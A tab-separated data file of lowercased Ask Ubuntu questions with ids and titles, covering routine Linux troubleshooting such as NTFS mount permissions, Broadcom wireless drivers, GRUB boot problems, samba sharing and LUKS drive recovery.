440729	permissions of an automount ntfs partition	hi there i have an ntfs partition which is mounted automatically on ubuntu 's startup . in qbittorrent i have the default download folder is that ntfs partition , but after i mount the partition automatically , i always have this message when i run qbittorrent : an i/o error occured for torrent xxx error : permission denied . i tried to unmount the ntfs partition but i get that the authentication is required to unmount it , so i think the partition is mounted by the root user . in the /etc/fstab file , this is the line which auto-mount the ntfs partition : uuid=32ea23cfea238de3 /media/backup ntfs rw , auto , users , exec , nls=utf8 , umask=003 , gid=46 , uid=1000 0 0 so , i think if the partition was mounted as me , i wo n't see this error message . in the other hand , i tried to run qbittorrent as the root user , but i 'm not seeing any of my downloads in the it . how can i solve this problem ?
440735	wireless not working on ubuntu 13.10	i just installed ubuntu 13.10 , but the wireless is not working and no wireless networks are showing : command : iwconfig outputs : eth0 no wireless extensions . eth1 ieee 802.11abg eeid : off/any mode : managed access point : not-associated tx-power-19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . the lspci -nn | grep 0280 outputs : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) command lsmod | grep -e b43 -e brcm -e wl outputs : wl 4207474 0 lib802011 14352 2 wl , lib80211_crypt_tkit cfg80211 479757 1 wl the following commands : sudo -i apt-get purge bcmwl-kernel-source echo `` blacklist b43 '' > > /etc/modprobe.d/blacklist.conf exit output is : youssef @ youssefsiblini : ~ $ sudo -i [ sudo ] password for youssef : root @ youssefsiblini : ~ # apt-get purge bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bcmwl-kernel-source root @ youssefsiblini : ~ # echo `` blacklist b43 '' > > /etc/modprobe.d/blacklist.conf root @ youssefsiblini : ~ # ^c root @ youssefsiblini : ~ # the out put of : lsmod | grep -e brcm -e wl and rfkill list all youssef @ youssefsiblini : ~ $ lsmod | grep -e brcm -e wl brcmsmac 562767 0 cordic 12574 1 brcmsmac brcmutil 15618 1 brcmsmac mac80211 596969 1 brcmsmac cfg80211 479757 2 brcmsmac , mac80211 bcma 46670 2 brcmsmac youssef @ youssefsiblini : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no many thanks in advance . youssef
440738	ubuntu 13.10 - booting into black screen , must press ctrl-alt-f7 to get into gui , every time	hoping for a quick and easy answer to ( perhaps ) a noobish question . i just freshly installed ubuntu 13.10 onto my desktop with multiple gpus . it seems that for some reason , after i installed the amd 13.12 catalyst drivers , every time i boot the computer i get put into a black screen . it seems that when i restart through grub , i am able to get into the gui if i press ctrl-alt-f7 . this seems ridiculous , is there something i can do to have it so the gui just loads automatically on start up ? thanks .
440739	something is wrong with the ppa	i 'm trying to install some packages from a ppa but it fails . i ca n't install the package i want . apt-get says `` unable to locate package '' : sudo apt-get install somepackage reading package lists ... done building dependency tree reading state information ... done e : unable to locate package somepackage and apt-get update says : err http : //ppa.launchpad.net codename/main amd64 packages 404 not found err http : //ppa.launchpad.net codename/main i386 packages 404 not found what 's wrong ?
440743	gnu grub black screen on boot [ not a duplicate ]	i have a windows 8.1/ubuntu 12.04 dual boot , and it has been working just fine in the past . i was working with windows 8.1 today and chose restart after being done and it took me to a black screen which shows this : gnu grub version 2.00-7 ubuntu 11 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists the possible completions of a device/filename1 grub > if i press tab it shows : possible commands are ; blocklist boot cat chainloader cmp color configfile debug displaymem embed find fstest geometry halt help hide impsprobe initrd install ioprobe kernel lock makeactive map md5crypt module modulenounzip pager partnew parttype password pause read reboot root rootnoverify savedefault serial setkey setup terminal terminfo testload testvbe unhide uppermem uuid vbeprobe grub > i have tried solutions available all over the web and none seem to be working . constraints are : i do n't have a windows installation disk because it came pre-installed with my laptop . i 'm using the hp envy 15-touchsmart 64-bit . i can not boot into windows since i 'm stuck on the black screen with no options other than the ones above . i had installed ubuntu a week back using a pendrive and kept the partition settings default . so now i do n't really know where exactly it got installed . i am now booted into ubuntu using the pendrive ( that 's now i am posting this question ) . so i can see the file system via the file folders , but i 'm not able to understand what commands to execute now to solve the problem . secure boot is already set to off and my system was working perfectly fine until today some hours ago .
440744	trying to install easypeasy 2.0 to a sony viao netbook ( intel atom )	i installed ubuntu 12.04 on a desktop computer , and wanted to remove xp from my netbook . i used a usb stick/pen drive of 7gb . i have downloaded the distro and tried all of the installers but they all fail at the syslinux.exe stage , and the dreaded `` your ... . wo n't be bootable '' is displayed . i decided to try it on a laptop i have ( preferably dual boot for now , untill i remove some files ) . i re-downloaded the iso and a loader ( all of them ) and guess what ? yep syslinux.exe fails again . i stopped sending error reports to microsoft . i have seen some answers but frankly am not technically capable . so is there any kind and patient sole out there than can help me with a simple guide ? i am looking forward to hearing from someone .
440747	newbie how to install on compaq evo xp laptop using usb	i am downloading ubuntu to use with my compaq xp laptop , which currently has xp ( 3 ) installed . should i partition , or just format the hard drive ? i do not intend to return this machine to xp . what can i download with xp to create a bootable usb drive , that can be read by the machine once the computer is formatted ? ty gb
440748	why does n't cheese work on ubuntu 12.04 ?	i recently replaced windows by ubuntu on my laptop . ubuntu however does not recognize my graphics card ( ati radeon hd 5470 ) nor my webcam . i installed cheese to solve the problem with the webcam , but when i run cheese , nothing happens ! i am absolute beginner in ubuntu so please explain to me in detail what to do .
440751	ubuntu 'disappeared ' on windows 8.1 update	as i have a very poor internet connection , i have only recently been able to update to windows 8.1 . up until then i had been using a dual boot of windows 8 and ubuntu ( 13.04 ) where i was givent the option of which os to use at boot . however , after updating the grub menu has completely disappeared . i have done some research and can find nothing about this . i am not sure whether ubuntu has been deleted or simply the option to access it has gone . any help would be greatly appreciated !
440755	why do some of my powertop commands not work	i 'm trying to make my powertop tweaks permanent . i ran sudo powertop -- html and the i have a list of the commands i need to add to /etc/rc.local . i added them to /etc/rc.local and most of them work , but some of them do n't . for example , the command to set vm writeback timeout to from bad to good is ... echo '1500 ' > '/proc/sys/vm/dirty_writeback_centisecs ' ; this command does not work even though i added it to the /etc/rc.local file . a few other commands related to enableing sata link power managmenet also do n't work such as ... echo 'min_power ' > '/sys/class/scsi_host/host0/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host1/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host2/link_power_management_policy ' ; these are also in the /etc/rc.local file . here is a copy of my rc.local file # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . # these commands work echo '0 ' > '/proc/sys/kernel/nmi_watchdog ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:1a.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:01.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:1d.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:1f.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:1f.2/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:16.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:14.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:1f.3/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:01:00.0/power/control ' ; # these commands do n't work echo '1500 ' > '/proc/sys/vm/dirty_writeback_centisecs ' ; echo 'min_power ' > '/sys/class/scsi_host/host0/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host1/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host2/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host3/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host4/link_power_management_policy ' ; echo 'min_power ' > '/sys/class/scsi_host/host5/link_power_management_policy ' ; echo '1 ' > '/sys/module/snd_hda_intel/parameters/power_save ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:00.0/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:01:00.1/power/control ' ; echo 'auto ' > '/sys/bus/pci/devices/0000:00:1b.0/power/control ' ; exit 0 why do n't these commands work ? update : when i run this script through a command prompt the commands work fine . so if i start my system , log in , and open a command prompt and type ... sudo /etc/rc.local the script runs fine and all settings in powertop are properly set . so this means that the script is executable and that the command syntax is okay . i 'm betting that rc.local script is executed properly during startup , but that something else after this is resetting the powertop settings that are n't working . any ideas why this is happening and how i can fix it ?
440756	is there a tool that can automatically power off monitor on inactivity ?	i am using lxde and that , unlike gnome , has no option to power off display after certain time . the screensaver can only display black screen which is still consuming lot of energy . is there any tool that could after n minutes turn off the display and start it on key / mouse event ?
440758	unable to control brightness , asus f551ma/intel hd	i am unable to control my screen brightness on my new asus f551ma with only ubuntu 12.04 installed . it has intel hd graphics . i ca n't control my brightness nor with fn+f5/f6 nor with settings-brightness control slider . it just does n't change . i can use some fn+ funcitons ( i can turn off/on screen , i can control sound volume and use play/pause , stop , next , previous for music player and that is more or less all . i ca n't change my brightness and can not turn trackpad off/on ) . i tryed changing grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' to grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_osi=linux '' saving and restarting . it does n't work . thank you for help .
440761	can you use ubuntu installation cd instead of windows on windows automatic recover ?	my pc has been thrown into an automatic recovery loop , and nothing is working . the only option i have is to repair using a media disc , but i do not have one for windows . if i select this option and use a disc that has ubunutu on it , will it download properly/fix the problem/functionally run ubuntu ?
440762	configure a samba folder for sharing with a synology diskstation	i am running ubuntu 13.10 server . on the server i have installed samba . in /etc/samba/smb.conf i 've defined a directory that should be shared out , as follows : [ ndata ] path = /srv/array1/dataspool available = yes valid users = backup read only = no browseable = yes public = no ; public = yes guest ok = yes writable = yes the user `` backup '' is already defined in ubuntu . from the /etc/passwd file : backup : x:34:34 : backup : /var/backups : /bin/sh the samba user `` backup '' is added using smbpasswd -a backup . and then sudo /etc/init.d/smbd restart to restart the samba-server . i also have a synology diskstation ( ds411j ; dsm 5.0 ) . on the synology i want to mount the shared folder . so , in the webgui of the ds , i specify : protocol : cifs folder : \\10.0.1.220\ndata account : backup password : ****** < the password set on the server above map to : < mount point > but when i try to commit the mount , it comes back with this `` failed to connect to the remote folder . please make sure the remote server is accessible via cifs protocol '' . [ edit ] here 's what i find in dmesg of the ds : [ 92567.090000 ] cifs vfs : send error in qfsattributeinfo = -13 [ 92567.100000 ] cifs vfs : send error in qfsunixinfo = -13 [ 92567.100000 ] cifs vfs : cifs_read_super : get root inode failed [ 92580.100000 ] cifs vfs : send error in qfsattributeinfo = -13 [ 92580.110000 ] cifs vfs : cifs_read_super : get root inode failed [ 92788.870000 ] cifs vfs : send error in qfsattributeinfo = -13 [ 92788.880000 ] cifs vfs : cifs_read_super : get root inode failed what could i be doing wrong ? any suggestions ?
440763	lost on installing ubuntu on my laptop with an ati graphics card	i just bought a new laptop and i wanted to install ubuntu 12.04 lts on it . the laptop has an ati graphic card though which led to the problem of it simply black-screening and not booting . there already is a proposed solution here , but i do n't seem to understand where the code changes should be made . when i try to enter sudo nano /etc/default/grub into the grub console which you can access through pressing `` c '' while in grub , it says that the command is unknown . so where should i enter the code ? thanks in advance for your help !
440764	ddc suddenly does n't detect my screen	i 'm using ubuntu 13.10 and connecting 22 '' screen through vga adapter . at the beginning ubuntu detected my screen and resolution and suddenly out of blue it stopped detecting it , leaving me with only 800x600 and 1024x768 resolutions . how can i make it detect my screen again ? any commands ? configuration files ?
440771	error installing wine	when i install wine , i get this . i have ubuntu 13.10 . i am connected to the internet , i am posting this with the same computer . i have no proxy . fixed . i the source to the main not us ben @ ben-hp-envy-dv4-notebook-pc : ~ $ sudo apt-get install wine1.7 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : liblcms2-2 : i386 winbind wine-gecko2.24 wine-gecko2.24 : i386 wine-mono4.5.2 wine1.7-amd64 wine1.7-i386 : i386 winetricks suggested packages : liblcms2-utils : i386 libpam-winbind libnss-winbind dosbox : any recommended packages : wine1.5-amd64 wine1.5-i386 : i386 wine-mono4.5.2 : i386 wine1.5 wine1.4 wine cxoffice5 cxgames5 the following new packages will be installed : liblcms2-2 : i386 winbind wine-gecko2.24 wine-gecko2.24 : i386 wine-mono4.5.2 wine1.7 wine1.7-amd64 wine1.7-i386 : i386 winetricks 0 upgraded , 9 newly installed , 0 to remove and 0 not upgraded . need to get 2,511 kb/156 mb of archives . after this operation , 378 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! liblcms2-2 install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ saucy-updates/main winbind amd64 2:3.6.18-1ubuntu3.1 404 not found [ ip : 91.189.91.15 80 ] err http : //security.ubuntu.com/ubuntu/ saucy-security/main winbind amd64 2:3.6.18-1ubuntu3.1 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.6.18-1ubuntu3.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? when i do it through the software center , i get this .
440772	chmod directories and files in one command ?	i have a directory `` project '' that contains a set of subdirectories and files . i want to give 777 permission to the directories and files from my 666 in the same directory with chmod command in my directory `` projct '' . how i can do that ?
440773	error : module mod-evasive does not exist ! after installation ubuntu 13.10	i installed mod-evasive with apt-get install libapache2-mod-evasive under ubuntu 13.10 after i insert a2enmod mod-evasive into shell i get an error error : module mod-evasive does not exist ! has anyone a suggestion to fix this problem ?
440774	set up ubuntu 13 to work with wacom pl-550	i 've got an old wacom pl-550 tablet , connected to my laptop via vga . it worked fine with win xp laptop , but now i 've upgraded to ubuntu , and it ca n't see it . wacom input driver is installed . wacom tablet screen remains dark , and ubuntu does not react . i 've tried activating it with projector key ( fn+f2 ) but it does n't work . rebooting ubuntu did not help . everything is up-to-date , i downloaded all the latest updates . how do i get this to work ?
440776	lost partition while installing ubuntu	i am new to ubuntu . earlier i was using window 7 and had 2 drives . a few minutes back i installed ubuntu 13.10 on my laptop . while installing , i selected the `` replace windows 7 '' option , and now i can see only 1 drive . this is output of fdisk . vishal @ ghost-pc : ~ $ sudo fdisk -lu disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002ad36 device boot start end blocks id system /dev/sda1 * 2048 968800255 484399104 83 linux /dev/sda2 968802302 976771071 3984385 5 extended /dev/sda5 968802304 976771071 3984384 82 linux swap / solaris i think i lost my other drive . please confirm how to recover that drive , because the drive is very important .
440777	force every new terminal to open in new tab	i have the habit of opening a terminal using the `` open terminal here '' command in folders . this causes a few terminals to remain open while i do n't really use them anymore , or i get confused which terminal was serving which purpose . i know i can label terminal tabs and such , but can i force a new terminal that is being openened , to become a new tab in a terminal screen ( if there is one open already ? ) this way i always have them tabbed in a single terminal . edit okay , so it 's been a while and my linux mojo has improved a lot . so the current solution to this situation for me has been using tmux . it 's a little more advanced than regular terminals and tabs but once i got the hang of it ( about an hour of trying ) i 'm very pleased with the way of going about things . first of all , i made sure that whenever i opened a terminal using ctrl-alt-t , it would open tmux by default . this can be achieved by adding the following line in your .bashrc file after all the aliases : [ [ $ term ! = `` screen '' ] ] & & exec 'tmux now everytime you spawn a terminal using ctrl-alt-t you will be presented with a tmux . to make sure you only have one terminal open at the same time i did the following : first of all , you can reattach a session in tmux by running tmux attach -d. this will disconnect all other clients connected to this session . this works fine if you are the only person using the sessions . but , if you do n't have a session running it will say it did not find any sessions . ergo , you need something like if ( nosession ) { tmux } else { tmux attach -d } . to do this create of append to your ~/.tmux.conf file the following line : # if run as `` tmux attach '' , create a session if one does not already exist new-session -n $ host ( thanks to this post ) in my .bashrc file , i changed the line added previously to the following : [ [ $ term ! = `` screen '' ] ] & & exec 'tmux attach -d' what this does is detach all other clients from the tmux session . when you do this , all other terminals close . they close because this line also makes sure that when you open a terminal ( ctrl-alt-t ) , it immediatly starts a tmux session . ergo , attach -d kills the other sessions . so this is the closest fix i could get and i 'm rather happy with it ! : ) the only thing i would still like is that when i press ctrl-alt-t it opens up my current session and also creates a new window . i have n't figured that out yet so feel free to help !
440778	can not access luks encrypted usb key anymore	i have a got a huge problem with my luks decrypted usb key . i was using it normally until two days ago . then i wanted to save something and i got an error message that the key is in read only mode . i ejected the key safely , but since then i am getting the following error message when i am trying to mount it : error mounting /dev/dm-0 at /media/ak/ak : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/dm-0 '' `` /media/ak/ak '' ' exited with non-zero exit status 32 : mount : block device /dev/mapper/test is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/mapper/test , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dmesg | tail gives ak @ aktp : ~ $ dmesg | tail [ 2292.343940 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk [ 2292.350454 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 2292.350465 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 2292.353742 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 2292.353753 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 2292.354722 ] sdb : sdb1 [ 2300.440960 ] bio : create slab < bio-1 > at 1 [ 2300.600200 ] bio : create slab < bio-1 > at 1 [ 2300.730311 ] ext4-fs ( dm-0 ) : info : recovery required on readonly filesystem [ 2300.730316 ] ext4-fs ( dm-0 ) : write access unavailable , can not proceed ak @ aktp : ~ $ the first thing i obviously did was creating an image file just for the case i am messing things up even more . so the first suspicion would obviously be that there is something wrong with the superblock . checking for the backup superblocks ( btw . this command did n't work before ; as i called it for writing this post is suddenly started working ) gives : ak @ aktp : ~ $ sudo dumpe2fs /dev/mapper/test | grep superblock dumpe2fs 1.42.8 ( 20-jun-2013 ) primary superblock at 0 , group descriptors at 1-2 backup superblock at 32768 , group descriptors at 32769-32770 backup superblock at 98304 , group descriptors at 98305-98306 backup superblock at 163840 , group descriptors at 163841-163842 backup superblock at 229376 , group descriptors at 229377-229378 backup superblock at 294912 , group descriptors at 294913-294914 backup superblock at 819200 , group descriptors at 819201-819202 backup superblock at 884736 , group descriptors at 884737-884738 backup superblock at 1605632 , group descriptors at 1605633-1605634 backup superblock at 2654208 , group descriptors at 2654209-2654210 backup superblock at 4096000 , group descriptors at 4096001-4096002 but applying another superblock delivers the following error message : ak @ aktp : ~ $ sudo e2fsck -b 98304 /dev/mapper/test e2fsck 1.42.8 ( 20-jun-2013 ) e2fsck : operation not permitted while trying to open /dev/mapper/test you must have r/w access to the filesystem or be root some other checks i made delivered the following messages : ak @ aktp : ~ $ sudo fsck -nfv /dev/mapper/test fsck from util-linux 2.20.1 e2fsck 1.42.8 ( 20-jun-2013 ) warning : skipping journal recovery because doing a read-only filesystem check . pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information free blocks count wrong ( 4514102 , counted=4513756 ) . fix ? no 2215 inodes used ( 0.11 % , out of 1974272 ) 712 non-contiguous files ( 32.1 % ) 0 non-contiguous directories ( 0.0 % ) # of inodes with ind/dind/tind blocks : 0/0/0 extent depth histogram : 2198/9 3382730 blocks used ( 42.84 % , out of 7896832 ) 0 bad blocks 1 large file 2081 regular files 125 directories 0 character device files 0 block device files 0 fifos 0 links 0 symbolic links ( 0 fast symbolic links ) 0 sockets -- -- -- -- -- -- 2206 files ... and ... ak @ aktp : ~ $ sudo e2fsck -n -c0 /dev/mapper/test e2fsck 1.42.8 ( 20-jun-2013 ) warning : skipping journal recovery because doing a read-only filesystem check . ak : clean , 2215/1974272 files , 3382730/7896832 blocks ... and ... sudo dumpe2fs /dev/mapper/test http : //dumptext.com/xcnxfx36 # ( the text was too long for pasting it here ) so along my understanding the usb key suddenly turned read only and combined with the superblock problem i can not repair it . i also tried this http : //serverfault.com/questions/580195/recover-data-from-ubuntu-encrypted-drive-luks but i get : ak @ aktp : ~ $ sudo vgscan [ sudo ] password for ak : reading all physical volumes . this may take a while ... no volume groups found also `` photorec '' did n't give me any result.does anybody of you have an idea how i could solve this ? the files on this usb key are really important for me and i was too dumb to make a backup in the last three weeks . i am grateful for every hint ! cheers , ak
440781	how can i find help for new lubuntu users ?	i 've just started using lubuntu 13.10 . it 's the first time i 've ever used linux . can any of you send me a tutorial-video for new users or explain the basics to me ?
440782	issue with tata photon max connection after upgrade	the dongle was working fine till the update . but after update the dongle asks for the password . but even after entering '0000 ' it does n't connect . i have updated it in windows . i am experiencing the issue in ubuntu 12.04 .
440789	openvpn : this is a generic configuration and can not directly be used	i have experienced a problem . i have installed openvpn as on vps . used .ovpn config with openvpn connect on my windows 7 desktop . works fine . when i tried to configure vpn connection on ubuntu , i have experienced following errors : via command line : sudo openvpn ~/downloads/server-locked.ovpn this is a generic configuration and can not directly be used via network connections manager ( which has icon placed on status bar , near time ) - > vpn connections - > configure vpn - > import i receive can not import vpn connection : the file '.ovpn ' could not be read or does not contain recognized vpn connection information error : the file to import was n't a valid openvpn client configuration.. what i already tried : sudo apt-get install openvpn sudo apt-get install network-manager-vpnc sudo apt-get install network-manager-vpnc-gnome what i should to do to make it work with *.ovpn file ? content of my server-locked.ovpn file # automatically generated openvpn client config file # generated on sat mar 29 11:51:42 2014 by main # define the profile name of this particular configuration file # ovpn_access_server_profile= ... /dynamic # ovpn_access_server_dynamic=1 # ovpn_access_server_cli_pref_allow_web_import=true # ovpn_access_server_cli_pref_enable_connect=true # ovpn_access_server_cli_pref_enable_xd_proxy=true # ovpn_access_server_wshost= ... :443 # ovpn_access_server_web_ca_bundle_start # -- -- -begin certificate -- -- - # -- -- -end certificate -- -- - # ovpn_access_server_web_ca_bundle_stop # ovpn_access_server_is_openvpn_web_ca=1 # ovpn_access_server_organization=openvpn technologies , inc. setenv forward_compatible 1 # ovpn_access_server_generic=1 setenv generic_config < ca > -- -- -begin certificate -- -- - -- -- -end certificate -- -- - < /ca > # # -- -- -begin rsa signature -- -- - # # digest : sha256 # # -- -- -end rsa signature -- -- - # # -- -- -begin certificate -- -- - # # -- -- -end certificate -- -- - # # -- -- -begin certificate -- -- - # # -- -- -end certificate -- -- -
440790	zenity from command line linux installation	i have a command line installation of linux , i.e . when i was installing it , i chose to install a command line version . i want to make use of zenity from the command line to popup dialog boxes etc . i 've installed zenity , but when i try to use it , i get a gtk error : ( zenity:22955 ) : gtk-warning ** : can not open display : xf_pre_connect : failed to open display : please check that the $ display environment variable is properly set . is it not possible to get zenity to work from a command line installation of linux ?
440792	3 errors in disk checking . how to i install ubuntu 12.04	i have just downloaded 12.04 . i tried to install it using usb . but the process is repeating again after 5th step . when i did disk checking , it is showing `` check finished : error found in 3 files '' . i downloaded 12.04 from ubuntu.com .
440794	banshee has its own id3 tags ?	an mp3 player called `` sandisk clip '' will freeze if any song names have non-ascii characters ( e.g . accented letters , like é á ó , etc . ) i have some mp3 files in banshee that i would like to add to the mp3 player , but some of them have non-ascii letters in their song name , artist name , etc . so i copied themm to a new folder . i used 3 different mp3 tag editing command lines tools to strip the id3 tags ( v1 and v2 ) from the desired files , just to be safe . i also wrote a script that changed the mp3 file names to remove non-ascii letters . now i load this directory of tag-less , ascii-safe mp3 files to banshee . banshee still recognizes a bunch of them and their song names & artist etc . appear with the non-ascii accented letters . how does banshee do this ? how does banshee put the `` old '' song name on a tag-less mp3 ?
440795	install sahara in openstack	i have already installed openstack following the tutorial from here . i want to install apache hadoop on openstack and i saw here that first i have to install devstack before i install sahara ( savanna ) my question are : - is it necessary to install devstack is there any other tutorial for sahara installation except this .
440796	recognizing a battery on a acer aspire one zg5	we have recently obtained an acer aspire one from a cousin , and erased its windows xp to install ubuntu 13.10 . the battery is not recognized , however . it looks like this problem has been encountered numerous times with acer notebooks and others , and with previous versions of ubuntu , too . looking into this previously asked question : how to get the correct battery status ? we notice that we do not have any /proc/acpi/battery/bat1/info file . in fact , we do not have any /proc/acpi/battery/ directory on our laptop . there is a procedure suggested here to reset the battery info file : `` on battery '' is not recognized but it has not worked for us . is this ( still ) a kernel problem ? our kernel is 3.11.0-19-generic ( buildd @ roseapple ) ( gcc version 4.8.1 ubuntu/linaro 4.8.1-10ubuntu8 ) . many thanks if you have read all the way down here . massimo & lorenzo . ============ may 3 , 2014 : it was a bios problem . updated to the last version and worked fine .
440801	installing ubuntu on ssd from usb distro	attempting to install ubuntu 13.1 on lenovo s10 netbook with ( new ) crucial m500 240gb ssd . installer crashes late in the ( very slow ) installation process . suse and mint also crashed when i tried them . is this possible to do ? problem is that installer crashes and ubuntu does n't get installed . most recent attempt crashed in the `` copying files '' part of installation -- so i assumed ssd had already been formatted -- and returned error code 30 -- suggesting a bad or overheated drive . since this is a brand new ssd direct from crucial , i have doubts about this , although certainly possible . is there a disk testing utility on the live version ? i have not been able to find one to use to test the ssd .
440804	how do i correct these errors so that i can install conky ? ( my weather is installed ok )	dpkg : warning : files list file for package my-weather-indicator ' missing , assuming package has no files currently installed . ( reading database ... 95 % dpkg : unrecoverable fatal error , aborting : files list file for package nitrux-icon-theme ' contains empty filename w : waited for dpkg -- assert-multi-arch but it was n't there - dpkggo ( 10 : no child processes ) e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : nitrux icons have been removed previously
440807	stuck in unity 2d , 12.04 after installing cuda	it was unity 3d before i install cuda . but after i installed cuda5.5 , i can never get back to unity 3d . any ideas ?
440813	securityproblem when running win xp on virtual box/ubuntu after april 8. ?	is there a securityproblem if i run my winxp on virtual box in ubuntu after april 8. ? i have configure my guestcomputer to communicate with my main computer via shared folders .
440815	onscreen messages prior to boot up and after logout 12.04	i have ubuntu 12.04 dual booting on an xp netbook . just before booting i get the following message - try ( hd0,0 ) : ntfs5 : error : '' prefix '' is not set - on logging out , when screen goes black i get ( a quickly disappearing message ) - could not write bytes : broken pipe - starting the winbind daemon winbind saned disabled : edit/etc/default/saned checking battery state ... . checking for unattended upgrades : broadcast message from root @ ubuntu ( unknown ) at 16.41 the system is going down for reboot now ! acpid : exiting . despite all this , the system seems to be working ok , but it 's mildly unsettling seeing it flash by every time . could anyone please help a complete newbie but great fan of ubuntu , to resolve it - thanks
440817	can i cap the monthly network transfer of a process ?	i 'm looking for a way to monitor and/or cap the monthly network transfer of an ubuntu server 12.04 process . i 'm running a plex media server , and while my current isp is very lax on my bandwidth usage , i 'm afraid that may be changing soon and want to be prepared . i 've looked into both ntm ( http : //netramon.sourceforge.net/eng/index.html ) and trickle ( http : //manpages.ubuntu.com/manpages/precise/man1/trickle.1.html ) but ntm appears to need a gui to run and does n't monitor on a per process basis and trickle does n't appear to allow total transfer caps , only upload/download speed limitations . all of the posts i 've seen on ask ubuntu are related to these two applications . is anyone aware of an application that will let me set a total monthly transfer limit , or any other way i could work this out ?
440818	customizing the boot message ?	when booting ubuntu , i get this message : is it possible to change the text ubuntu 12.04 to loading , please wait . ?
440819	when watching video full screen online , screen goes grey	when i have watched a video online ( usualy with youtube video 's ) , be it with firefox or chrome and press the button to exit full-screen mode , my laptop screen turns grey and there seems to be nothing i can do about it but enter tty2 with ctrlaltf2 , login and type sudo restart lightdm and log back in , resulting in loss of work . i own an asus n76vm laptop and it 's running ubuntu 12.04 . offcourse i do n't want this to happen and i 'd rather make it so that it does n't happen ; instead of a sollution for after it has happend , but any sollution rather then restarting lightdm would make me happy .
440820	files are hiding automatically in between ubuntu 12.04 and windows 8	i have installed both windows 8 and ubuntu 12.04 , in separate drives . i am using 2 other drives commonly between 2 os to store the data . if i copy or use those files with ubuntu , later if i tried to use those from windows 8 , those files are disappearing from the disk . if i switch again to ubuntu , then also i am unable see those files . and i seen the disk free space availability , that showing including those files , so i changed disk properties to show hidden , .extension files , then also i am unable see those files in both the os . may i know what may be the reason and how may i get back those files ?
440821	execute script when disk space is low	is there a smart way to execute a script when disk space is low ? i know i can manually check disk space , but it seems like a common problem to want to delete log files when disk space is low ( for example ) which is what i want to do .
440824	preparing to install ubuntu hangs on mac	i have a mid-2009 macbook pro , the 5,5 . i have one ssd and one hybrid drive , with 8gb of memory . i am installing the 64-bit precise pangolin from a dvd onto my hybrid drive , as osx lives on my ssd . i split the hybrid drive into two partitions in disk utility , leaving the second half as free space , then booted ubuntu just fine from the live cd . i formatted my second partition using gparted , and split the second half into a 250gb ext4 format and a 1gb swap file . i 've tried disabling nomodeset and i 've checked the disk for defects , but it keeps hanging on the preparing to install screen . i am new to ubuntu and do n't know what else to do . can anyone be of assistance ?
